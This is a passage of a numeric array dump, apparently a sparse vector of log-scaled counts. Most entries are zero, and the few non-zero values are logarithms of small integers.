0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.3322045101752034, 0, 0.0, 4.631631038266565, 0, 0, 0.0, 0.0, 0.0, \n 6.198469360840315, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.6888794541139363, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.0794415416798357, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.787491742782046, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 6.182084906716631, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906,\n 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.550898738446989, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 5.365976015021851, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0,\n 1.9459101490553132, 3.0841946160253877, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 5.3230099791384085, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0,\n 0.0, 3.4825185607408002, 0, 0.0, 0.0, 5.2237778411112, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.553876891600541, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 9.368314490550079, 5.2237778411112, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0,\n 0.0, 0.0, 2.772588722239781, 1.3862943611198906, 0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 4.160336650881089, \n 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 4.859812404361672, 0.0, 0.0, 0.0, 5.493061443340549, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 3.4339872044851467, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0,\n 0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, \n 1.0986122886681098, 0, 0.0, 2.8398715690385097, 2.1972245773362196, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0,\n 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.93848385770662, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 2.9444389791664403, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 3.6109179126442243, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 